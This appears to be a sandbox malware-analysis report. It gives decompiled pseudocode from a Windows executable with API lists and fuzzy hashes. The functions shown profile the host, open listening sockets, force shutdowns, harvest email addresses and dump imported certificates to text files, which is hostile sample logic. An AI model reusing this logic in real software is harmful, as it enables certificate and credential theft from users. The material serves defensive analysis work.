    				intOrPtr _t62;
    				signed short _t66;
    				signed char _t67;
    				void* _t71;
    				intOrPtr _t82;
    				long _t87;
    				signed int _t88;
    				long* _t89;
    				void* _t95;
    
    				_t89 = __edi;
    				 *__eax = 0x271a;
    				 *((intOrPtr*)(__eax + 0xc)) = 4;
    				 *((intOrPtr*)(__edx + 0x1c)) =  *((intOrPtr*)(__edx + 0x1c)) + 1;
    				 *((intOrPtr*)(__edx + 0x14)) = __ecx;
    				_t71 = 1;
    				if((_a1092 & 0x00000008) == 0) {
    					L13:
    					if(_t71 == 0) {
    						goto L2;
    					} else {
    						if((_a1092 & 0x00000010) == 0) {
    							L22:
    							if(_t71 == 0) {
    								goto L2;
    							} else {
    								_t114 = _a1092 & 0x00000020;
    								if((_a1092 & 0x00000020) == 0) {
    									goto L6;
    								} else {
    									E0040C650(_t114, _t89, 2);
    									E0040C650(_t114, _t89, 0x17);
    									return _t71;
    								}
    							}
    						} else {
    							_t54 = GetModuleFileNameW(0,  &_a80, 0x103);
    							_a16 = _t54;
    							if(_t54 != 0) {
    								 *((short*)(_t95 + 0x54 + _t54 * 2)) = 0;
    								_t71 = E004189F0( &_a80, 0, _t89, 0x271e);
    							}
    							_a16 = 0x104;
    							if(_t71 == 0) {
    								goto L2;
    							} else {
    								_t55 =  &_a16;
    								__imp__GetUserNameExW(2,  &_a80, _t55);
    								if(_t55 != 0) {
    									_t56 = _a4;
    									if(_t56 != 0) {
    										ds = 0x271f;
    										asm("daa");
    										 *_t56 =  *_t56 + _t56;
    										 *((short*)(_t95 + 0x54 + _t56 * 2)) = 0;
    										_push(_t89);
    										_t71 = E004189F0( &_a72, 0);
    									}
    								}
    								goto L22;
    							}
    						}
    					}
    				} else {
    					E004105D0( &_a28);
    					_t62 =  *((intOrPtr*)( *__edi + 0x14));
    					_t79 = _t62 + 0x16;
    					if(_t62 + 0x16 <= _t62 || E00410740(_t79, __edi) == 0) {
    						L1:
    						_t71 = 0;
    						__eflags = 0;
    						L2:
    						__eflags = _a11 - 1;
    						if(_a11 == 1) {
    							_t48 =  *_t89;
    							__eflags = _t48;
    							if(_t48 != 0) {
    								HeapFree( *0x42e6d4, 0, _t48);
    							}
    							 *_t89 = 0;
    						}
    						L6:
    						return _t71;
    					} else {
    						_t87 =  *__edi;
    						 *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x14)) + _t87 + 8)) = 6;
    						_t66 = E00410820( *((intOrPtr*)(_t87 + 0x14)) + _t87 + 0x10,  &_a28, 6);
    						_t82 =  *((intOrPtr*)(_t66 + 8)) +  *((intOrPtr*)(_t87 + 0x14)) + 0x10;
    						if(_t82 > 0xa00000) {
    							goto L1;
    						} else {
    							 *_t66 = 0x271c;
    							 *((intOrPtr*)(_t66 + 4)) = 0x20000;
    							 *((intOrPtr*)(_t66 + 0xc)) = 6;
    							 *((intOrPtr*)(_t87 + 0x1c)) =  *((intOrPtr*)(_t87 + 0x1c)) + 1;
    							 *((intOrPtr*)(_t87 + 0x14)) = _t82;
    							__imp__GetUserDefaultUILanguage();
    							_t88 = _t66 & 0x0000ffff;
    							_push(2);
    							_t67 = _t95 + 0x18;
    							_t95 = _t95 + 1;
    							_push(_t67 & 0x00000018);
    							_push(0x20000);
    							_push(0x271d);
    							 *(_t95 + 0x24) = _t88;
    							_t71 = E00418930(__edi);
    							goto L13;
    						}
    					}
    				}
    			}

    APIs
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 0040C9C8
      • Part of subcall function 00410740: HeapFree.KERNEL32(?,?,?,0041895B,00000000,00000000,00000000,00000000,0040C6FF,-00002720,00020000,00000000,00000000,?,00000001), ref: 00410752
    • GetUserDefaultUILanguage.KERNEL32(?,?,00000006), ref: 0040CA5D
    • GetModuleFileNameW.KERNEL32(00000000,?,00000103), ref: 0040CAA2
    • GetUserNameExW.SECUR32(00000002,?,00000104), ref: 0040CAE4
      • Part of subcall function 004105D0: GetVersionExW.KERNEL32 ref: 004105ED
      • Part of subcall function 004105D0: GetNativeSystemInfo.KERNEL32 ref: 004105FB
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FreeHeapNameUser$DefaultFileInfoLanguageModuleNativeSystemVersion
    • String ID:
    • API String ID: 1129319608-3916222277
    • Opcode ID: e33d483f263785f38efcf3e6fb6cb0e58ed10f0c6557ea01c5000bf641b83ff5
    • Instruction ID: 0d41d9e7b5bc1bb790579288fb5c6d4a24f7772a5c0e227b605144d67b22647a
    • Opcode Fuzzy Hash: e33d483f263785f38efcf3e6fb6cb0e58ed10f0c6557ea01c5000bf641b83ff5
    • Instruction Fuzzy Hash: 3941DFB06443419BD314DF14D985BA7B7E4AF80304F08452FF984AB3D2C778D889CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(?,00000001,00000006), ref: 00415076
    • bind.WS2_32(00000000,00000002,-0000001D), ref: 0041509C
    • listen.WS2_32(00000000,7FFFFFFF), ref: 004150AC
    • closesocket.WS2_32(00000000), ref: 004150B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID: p0u
    • API String ID: 952684215-1742372003
    • Opcode ID: be21aba39a96f2f9b71014a125fd46b950c8a25fb74be776c65c1ad629f45bdd
    • Instruction ID: 99ac13865a48e29dacfe8f6e27a71a168fc956e69657dab41d105f68ae03966d
    • Opcode Fuzzy Hash: be21aba39a96f2f9b71014a125fd46b950c8a25fb74be776c65c1ad629f45bdd
    • Instruction Fuzzy Hash: 3F01F530501A2066D320EA389D45BEF35956FC5761F848729F8B1E72E1EB38898883DA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 82%
    			E0040E230(void* __edx) {
    				signed int _v120;
    				void* __edi;
    				signed char _t12;
    				void* _t14;
    				unsigned int _t19;
    
    				_t12 =  *0x42d424; // 0x0
    				if((_t12 & 0x00000010) == 0) {
    					if((_t12 & 0x00000008) != 0) {
    						E004101F0();
    						_t12 =  *0x42d424; // 0x0
    					}
    					if((_t12 & 0x00000003) == 0) {
    						if((_t12 & 0x00000004) != 0) {
    							return ExitWindowsEx(0x14, 0x80000000);
    						}
    						goto L9;
    					} else {
    						_t14 = E004129B0(L"SeShutdownPrivilege");
    						_t19 =  *0x42d424; // 0x0
    						__imp__InitiateSystemShutdownExW(0, 0, 0, 1, _t19 >> 0x00000001 & 0x00000001, 0x80000000);
    						return _t14;
    					}
    				} else {
    					_t12 = E0041A520( &_v120);
    					if(_t12 == 0) {
    						L9:
    						return _t12;
    					} else {
    						_v120 = _v120 | 0x00000020;
    						 *0x42e8f8 =  *0x42e8f8 | 0x00000010;
    						E0041A5C0( &_v120);
    						return ExitWindowsEx(0x14, 0x80000000);
    					}
    				}
    			}

    APIs
    • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,00000000,80000000), ref: 0040E2A7
      • Part of subcall function 0041A520: CreateMutexW.KERNEL32(0042E930,00000000,0042E788,?), ref: 0041A569
      • Part of subcall function 0041A520: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041A578
      • Part of subcall function 0041A520: CloseHandle.KERNEL32(00000000), ref: 0041A58A
      • Part of subcall function 0041A5C0: ReleaseMutex.KERNEL32(?,?,00000000), ref: 0041A60D
      • Part of subcall function 0041A5C0: CloseHandle.KERNEL32(?), ref: 0041A614
    • ExitWindowsEx.USER32(00000014,80000000), ref: 0040E267
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleMutex$CreateExitInitiateObjectReleaseShutdownSingleSystemWaitWindows
    • String ID: $SeShutdownPrivilege
    • API String ID: 3115218271-2253681161
    • Opcode ID: 1da8a9f5749e858456e2145c5951a79674b2b815f7af96fca57dc92cb2172cd1
    • Instruction ID: e21cf1f491083f6032e94e80d8cf2aced7c6104cf6be9939c8967ab8324e9996
    • Opcode Fuzzy Hash: 1da8a9f5749e858456e2145c5951a79674b2b815f7af96fca57dc92cb2172cd1
    • Instruction Fuzzy Hash: B001F735700200A5EA2477599D0BFD93758DB40B09FE4087EFAC5361F2C6B82416926D
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(0000007E,00000001,00000006), ref: 00414EE9
    • bind.WS2_32(00000000,?,-0000001D), ref: 00414F09
    • listen.WS2_32(00000000,?), ref: 00414F19
    • closesocket.WS2_32(00000000), ref: 00414F24
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID: p0u
    • API String ID: 952684215-1742372003
    • Opcode ID: 6d3e67332895148afcb5e8b08cb1ed534dab948c37b46b11654884dfeb8836ff
    • Instruction ID: 24ac27e043fd9b8ecda0badeb71ceb333669ae391d62fde6e33f795113d85586
    • Opcode Fuzzy Hash: 6d3e67332895148afcb5e8b08cb1ed534dab948c37b46b11654884dfeb8836ff
    • Instruction Fuzzy Hash: D3F0277120452077D2145B38AE09EEF3668EFD17B0B00432AF523E62E0F7788C82C2E8
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 00415329
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 00415349
    • closesocket.WS2_32(00000000), ref: 00415354
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID: p0u
    • API String ID: 1873677229-1742372003
    • Opcode ID: cde26db7407258dbc4cdb5e2141c4221c56a916a6199631f3eb37feaeba1ce55
    • Instruction ID: 467bb6e162b5c60878463fe77fa36cd9493afaeeb4dc03b5692ef376c5f73ffe
    • Opcode Fuzzy Hash: cde26db7407258dbc4cdb5e2141c4221c56a916a6199631f3eb37feaeba1ce55
    • Instruction Fuzzy Hash: EEE0923110092067D6182738AC0EAEF2654AB817B07080319F933E61E1F7A88C8181A4
    Uniqueness

    Uniqueness Score: -1.00%

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID: u5VPhXB
    • API String ID: 0-1119068662
    • Opcode ID: d5d4940b2570c89eb081d0652c14ae96634e4fbd613d05b34bb7dc293484ac81
    • Instruction ID: d311ddb97ebac8ab0098921e18af0608a1b5a211382f9f48b192f0ff14e5409a
    • Opcode Fuzzy Hash: d5d4940b2570c89eb081d0652c14ae96634e4fbd613d05b34bb7dc293484ac81
    • Instruction Fuzzy Hash: 2DE1EF31504381AFD735EF34D886AA6BBB1FF56310B9844BFC480AB992E735548BCB46
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412930(intOrPtr _a4) {
    				intOrPtr _v24;
    				void* _v32;
    				void* _v36;
    				signed int _t6;
    				void* _t18;
    				void* _t20;
    				intOrPtr _t21;
    
    				_t21 = _a4;
    				_t6 = CreateToolhelp32Snapshot(4, 0);
    				_t20 = _t6;
    				if(_t20 == 0xffffffff) {
    					return _t6 | 0xffffffff;
    				} else {
    					_t18 = 0;
    					_v32 = 0x1c;
    					if(Thread32First(_t20,  &_v32) != 0) {
    						do {
    							if(_v24 == _t21) {
    								_t18 = _t18 + 1;
    							}
    						} while (Thread32Next(_t20,  &_v36) != 0);
    					}
    					CloseHandle(_t20);
    					return _t18;
    				}
    			}

    APIs
    • CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0041293D
    • Thread32First.KERNEL32 ref: 0041295B
    • Thread32Next.KERNEL32 ref: 0041297D
    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 00412985
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
    • String ID:
    • API String ID: 3643885135-0
    • Opcode ID: fdd97d772bf086a796bf9c1edaf51b29d20c289794e196395a8406a2a9304c96
    • Instruction ID: ab7839618c050b0d7b9a10ac662ef457f472db0ce98ecdc34f47adabf94b15dd
    • Opcode Fuzzy Hash: fdd97d772bf086a796bf9c1edaf51b29d20c289794e196395a8406a2a9304c96
    • Instruction Fuzzy Hash: D0F0F9B62002155BD210AF1D9D44BEBB3D8EF94320F04022AFA69D21A0D3309E58CABA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 73%
    			E00420440() {
    				char _v696;
    				char _v832;
    				char _v900;
    				char _v928;
    				long _v1092;
    				char _v1096;
    				char _v1104;
    				intOrPtr* _v1112;
    				void* _v1120;
    				char _v1128;
    				char _v1136;
    				char _v1144;
    				intOrPtr* _v1148;
    				char _v1152;
    				intOrPtr* _v1156;
    				void* _v1160;
    				intOrPtr* _v1164;
    				char _v1173;
    				char _v1192;
    				signed char _v1197;
    				void* __ebx;
    				void* __esi;
    				long* _t50;
    				intOrPtr* _t64;
    				intOrPtr* _t67;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				void* _t74;
    				intOrPtr* _t76;
    				intOrPtr* _t79;
    				signed char _t81;
    				void* _t82;
    				intOrPtr* _t83;
    				intOrPtr* _t85;
    				void* _t87;
    				signed short _t89;
    				signed int _t94;
    				void* _t95;
    				short* _t115;
    				intOrPtr* _t132;
    				char* _t134;
    				char* _t137;
    				void* _t138;
    
    				_t138 =  &_v1112;
    				_t50 =  &_v1092;
    				_v1092 = 0;
    				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t50);
    				if(_t50 != 0) {
    					L30:
    					return _t50;
    				}
    				_t132 = _v1112;
    				if(_t132 == 0) {
    					goto L30;
    				}
    				_t5 = _t50 + 0x39; // 0x39
    				E00424100(_t5,  &_v1096);
    				_t134 =  &_v1104;
    				E00424100(0x3a, _t134);
    				_push(_t134);
    				_push( &_v1096);
    				_t95 = 0;
    				_push(_t132);
    				_v1120 = 0;
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0xc))))() != 0) {
    					L26:
    					_t50 =  *((intOrPtr*)( *((intOrPtr*)( *_t132 + 8))))(_t132);
    					if(_t95 == 0) {
    						goto L30;
    					}
    					if( *_t95 != 0) {
    						E00424100(0x38,  &_v696);
    						E0040D880(_t95, 0xcc,  &_v696);
    					}
    					return HeapFree( *0x42e6d4, 0, _t95);
    				}
    				_push( &_v1136);
    				_push(_t132);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x20))))() != 0) {
    					goto L26;
    				}
    				_t13 = _t95 + 0x3b; // 0x3b
    				E00424100(_t13,  &_v900);
    				_t64 = _v1144;
    				 *((intOrPtr*)( *((intOrPtr*)( *_t64 + 0xc))))(_t64);
    				_t67 = _v1148;
    				_push(_t67);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t67 + 0x10))))() != 0) {
    					L25:
    					_t69 = _v1152;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t69 + 8))))(_t69);
    					goto L26;
    				}
    				do {
    					_t71 = _v1152;
    					_push( &_v1144);
    					_push(_t71);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t71 + 0x14))))() != 0) {
    						goto L23;
    					}
    					_t76 = _v1152;
    					_push( &_v1144);
    					_push(0x4015d0);
    					_push(_t76);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t76))))() != 0) {
    						L22:
    						_t79 = _v1164;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t79 + 8))))(_t79);
    						goto L23;
    					}
    					_t81 = 1;
    					_v1173 = 1;
    					while(1) {
    						_push(_t81 & 0x000000ff);
    						_t137 =  &_v832;
    						_t82 = E00411D10(_t81, 0x34, _t137,  &_v928);
    						_t138 = _t138 + 8;
    						if(_t82 <= 0) {
    							break;
    						}
    						_t85 = _v1156;
    						_v1152 = 0x64;
    						_t87 =  *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0xc))))(_t85, _t137, 0,  &_v1128, 0x64,  &_v1152);
    						if(_t87 != 0) {
    							if(_t87 == 0x7a || _t87 == 1) {
    								L20:
    								_t81 = _v1197 + 1;
    								_v1197 = _t81;
    								if(_t81 <= 0x64) {
    									continue;
    								}
    							}
    							break;
    						}
    						_t89 = _v1152;
    						_t115 =  &_v1152;
    						if(_t89 == 0) {
    							L15:
    							if( *_t115 != 0x40) {
    								goto L20;
    							}
    							L16:
    							if(E00410D70( &_v1192,  &_v1152, 0xffffffff) != 0) {
    								E00410D70( &_v1192, 0x403964, 1);
    							}
    							goto L20;
    						}
    						_t94 = _t89 & 0x0000ffff;
    						while(_t94 != 0x40) {
    							_t94 =  *(_t115 + 2) & 0x0000ffff;
    							_t115 = _t115 + 2;
    							if(_t94 != 0) {
    								continue;
    							}
    							goto L15;
    						}
    						goto L16;
    					}
    					_t83 = _v1156;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t83 + 8))))(_t83);
    					goto L22;
    					L23:
    					_t74 = _v1160;
    					_push(_t74);
    				} while ( *((intOrPtr*)( *((intOrPtr*)( *_t74 + 0x10))))() == 0);
    				_t95 = _v1160;
    				goto L25;
    			}

    APIs
    • CoCreateInstance.OLE32 ref: 00420467
    • HeapFree.KERNEL32(?,00000000,00000000), ref: 00420672
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateFreeHeapInstance
    • String ID: d
    • API String ID: 2783224145-2564639436
    • Opcode ID: 0964ec3f97a9802f8aa6ed60f2fa9b76d32523cd66aa7e913250ccec7badf10d
    • Instruction ID: d4fbc3669c528c7789dc33733ea52d839242ad5847697b6884584b2ed1734400
    • Opcode Fuzzy Hash: 0964ec3f97a9802f8aa6ed60f2fa9b76d32523cd66aa7e913250ccec7badf10d
    • Instruction Fuzzy Hash: CF618C743043129FD714DF14D880AABB3E8AFC8748F50485EF9859B291D739ED4ACB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E004234C0(intOrPtr __eax, intOrPtr* _a4, short* _a8, signed int _a12) {
    				char _v536;
    				char _v600;
    				char _v728;
    				char _v744;
    				struct _SYSTEMTIME _v760;
    				intOrPtr _v764;
    				intOrPtr _v772;
    				intOrPtr _v776;
    				char _v784;
    				void* __ebx;
    				void* __esi;
    				void* _t42;
    				signed int _t45;
    				void* _t54;
    				intOrPtr* _t55;
    				void* _t70;
    				short* _t71;
    				void* _t73;
    				signed int _t74;
    				char* _t77;
    				signed int _t80;
    				void* _t82;
    				void* _t83;
    
    				_t82 = (_t80 & 0xfffffff8) - 0x2fc;
    				_t55 = _a4;
    				_t74 = _a12;
    				_t71 = _a8;
    				__imp__PFXImportCertStore(_t55, _t71, _t74, _t70, _t73, _t54);
    				_v776 = __eax;
    				if(__eax == 0 || (_t74 & 0x10000000) != 0 || _t55 == 0 ||  *_t55 <= 0 ||  *((intOrPtr*)(_t55 + 4)) == 0 || E0041CFE0() == 0) {
    					L15:
    					return _v776;
    				} else {
    					GetSystemTime( &_v760);
    					E00424100(0xaa,  &_v600);
    					_t77 =  &_v744;
    					E00424100(0xab, _t77);
    					E00423230( &_v536);
    					_push(_v760.wYear & 0x0000ffff);
    					_push(_v760.wMonth & 0x0000ffff);
    					_push(_v760.wDay & 0x0000ffff);
    					_push(_t77);
    					_push( &_v536);
    					_t78 =  &_v728;
    					_t42 = E00411D10( &_v600, 0x3e,  &_v728,  &_v600);
    					_t83 = _t82 + 0x18;
    					if(_t42 <= 0 || E0040D620( *_t55,  &_v728, 2, 0, _t78,  *((intOrPtr*)(_t55 + 4))) == 0 || _t71 == 0 ||  *_t71 == 0) {
    						goto L15;
    					} else {
    						_t45 = 0;
    						if(_v728 == 0) {
    							L13:
    							 *((short*)(E00410820(_t83 + 0x48 + _t45 * 2, L".txt", 8) + 8)) = 0;
    							if(E00411EF0(_t47 | 0xffffffff,  &_v784, _t71) != 0) {
    								E0040D620(_v764, _v772, 2, 0,  &_v728, _v772);
    								E00411ED0( &_v784);
    							}
    							goto L15;
    						}
    						do {
    							_t45 = _t45 + 1;
    						} while ( *((short*)(_t83 + 0x40 + _t45 * 2)) != 0);
    						goto L13;
    					}
    				}
    			}

    APIs
    • PFXImportCertStore.CRYPT32(?,?,?), ref: 004234DB
      • Part of subcall function 0041CFE0: WaitForSingleObject.KERNEL32(?,00000000,00423519), ref: 0041CFE8
    • GetSystemTime.KERNEL32(?), ref: 00423526
      • Part of subcall function 00423230: GetUserNameExW.SECUR32(00000002,?,?,?,?,004233D7,?,?,00403968,00000001), ref: 00423244
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: CertImportNameObjectSingleStoreSystemTimeUserWait
    • String ID: .txt
    • API String ID: 1412380219-2195685702
    • Opcode ID: 6636aed9de57ea8c3d54afaeaaa9c7fa6abbe0e821cf0ef9b2db7e8fd1b46098
    • Instruction ID: 49bb01059e0c09810645f442727d8a581b68c236f3fe7ed6893d6da392d1997e
    • Opcode Fuzzy Hash: 6636aed9de57ea8c3d54afaeaaa9c7fa6abbe0e821cf0ef9b2db7e8fd1b46098
    • Instruction Fuzzy Hash: 16316031604320A6CB20EF55D945BABB3FCAF84705F44492EBA84A7391D778DE44C7A6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 50%
    			E0041D000(void* __ebx, void* __edi, intOrPtr _a4) {
    				char _v264;
    				char _v284;
    				intOrPtr _v296;
    				char _v300;
    				char _v388;
    				char _v392;
    				short _v456;
    				char _v472;
    				long _v504;
    				char _v508;
    				intOrPtr _v512;
    				char _v516;
    				intOrPtr _v520;
    				void* __esi;
    				int _t27;
    				intOrPtr _t39;
    				void* _t41;
    				struct _OSVERSIONINFOW* _t54;
    				void* _t59;
    				intOrPtr _t71;
    
    				_t59 = __edi;
    				_t41 = __ebx;
    				_t71 = _a4;
    				_v504 = 0x28;
    				if(GetComputerNameW( &_v456,  &_v504) == 0) {
    					_t24 = E00424100(0xdc,  &_v456);
    				}
    				_t54 =  &_v284;
    				E00410870(_t24, _t54, 0, 0x11c);
    				_v296 = 0x11c;
    				_t27 = GetVersionExW(_t54);
    				if(_t27 != 0) {
    					_push(0x100);
    					_push(0);
    					_push( &_v264);
    				} else {
    					_push(0x11c);
    					_push(_t27);
    					_push( &_v284);
    				}
    				E00410870(_t27);
    				_push(_t41);
    				_push(_t59);
    				E00424100(0xd7,  &_v388);
    				E00424100(0xd8,  &_v504);
    				_v516 = E00416580(0x80000002,  &_v388,  &_v504);
    				E00424100(0xd9,  &_v508);
    				_v512 = E00416730( &_v508,  &_v392);
    				E00424100(0xda,  &_v508);
    				_push(E00412560( &_v516, 8));
    				_push(E00412560( &_v300, 0x11c));
    				_push( &_v472);
    				_t69 = _t71;
    				_t39 = E00411D10(_t38, 0x3c, _t71,  &_v508);
    				_v520 = _t39;
    				if(_t39 < 1) {
    					return E00424100(0xdb, _t69);
    				}
    				return _t39;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ComputerNameVersion
    • String ID: (
    • API String ID: 3835364902-3887548279
    • Opcode ID: ce2eb826d164ab4c0298664d3c3b30ebf034708df98346be6e5d55764e81427c
    • Instruction ID: ddd1893d52ab8207418ae9bd97cf108c1ea9fccda328ff67ef874f88ae6b10e5
    • Opcode Fuzzy Hash: ce2eb826d164ab4c0298664d3c3b30ebf034708df98346be6e5d55764e81427c
    • Instruction Fuzzy Hash: E831EC756043109BD310EB51EC45BEBB798EBD4304F40482FFA45B7181DA78A9498BE6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00416E10(void* __ecx, void* __edx, signed char _a4, signed char _a6, signed char _a7, intOrPtr _a8, signed char _a12) {
    				char _v268;
    				signed int _v281;
    				signed int _v282;
    				signed int _v283;
    				signed int _v284;
    				signed int _v285;
    				signed int _v286;
    				signed int _v287;
    				signed int _v288;
    				signed int _v290;
    				signed int _v292;
    				signed int _v296;
    				void* __esi;
    				unsigned int _t38;
    				signed char _t40;
    				signed int _t42;
    				void* _t43;
    				signed int _t44;
    				signed char _t51;
    				char* _t52;
    				signed char _t56;
    				signed int _t59;
    				intOrPtr _t61;
    
    				_t61 = _a8;
    				_t56 = _a4;
    				_t38 = E00410820( &_v284, __ecx, 0x10);
    				_v296 = _v296 ^ _t38;
    				_v292 = _v292 ^ _t38;
    				_t51 = _a7;
    				_v288 = _v288 ^ _t56;
    				_v284 = _v284 ^ _t56;
    				_v287 = _v287 ^ _t56;
    				_v285 = _v285 ^ _t51;
    				_v283 = _v283 ^ _t56;
    				_v290 = _v290 ^ _t38 >> 0x00000010;
    				_t40 = _a6;
    				_v286 = _v286 ^ _t40;
    				_v282 = _v282 ^ _t40;
    				_v281 = _v281 ^ _t51;
    				if(__edx != 0) {
    					E00412640(E00410820( &_v268, __edx, 0x102),  &_v296, 0x10);
    				}
    				_t42 = _a12 & 0x000000ff;
    				if(_t42 != 0) {
    					_t43 = _t42 - 1;
    					if(_t43 == 0) {
    						_t52 = L"Local\\";
    						_t59 = 6;
    						goto L7;
    					} else {
    						_t42 = _t43 - 1;
    						if(_t42 == 0) {
    							_t52 = L"Global\\";
    							_t59 = _t42 + 7;
    							L7:
    							_t44 = _t59;
    							if(_t59 == 0xffffffff) {
    								_t44 = 0;
    								if(_t52 != 0 &&  *_t52 != 0) {
    									do {
    										_t44 = _t44 + 1;
    									} while ( *((short*)(_t52 + _t44 * 2)) != 0);
    								}
    							}
    							_t42 = E00410820(_t61, _t52, _t44 + _t44);
    							 *((short*)(_t42 + _t61)) = 0;
    							_t61 = _t61 + _t59 * 2;
    						}
    					}
    				}
    				__imp__StringFromGUID2( &_v284, _t61, 0x28);
    				return _t42;
    			}


    APIs
    • StringFromGUID2.OLE32(0042EB70,?,00000028,0042EB70,0042EB70,00000010,00000000,00000000), ref: 00416EE6
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: FromString
    • String ID: Global\$Local\
    • API String ID: 1694596556-639276846
    • Opcode ID: c518a0106da20139d8f33b41c7c8c43373562c85c8e8f6ce46fc617e2a0b7c24
    • Instruction ID: 04790baba4c3299eb9599263e725de4ad42ce044e4b67c585554e638825a711d
    • Opcode Fuzzy Hash: c518a0106da20139d8f33b41c7c8c43373562c85c8e8f6ce46fc617e2a0b7c24
    • Instruction Fuzzy Hash: D721D63510C38566C715DF38C8019EB7BA59F85320F058A6FF494CB282D6B8DA89C3DA
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
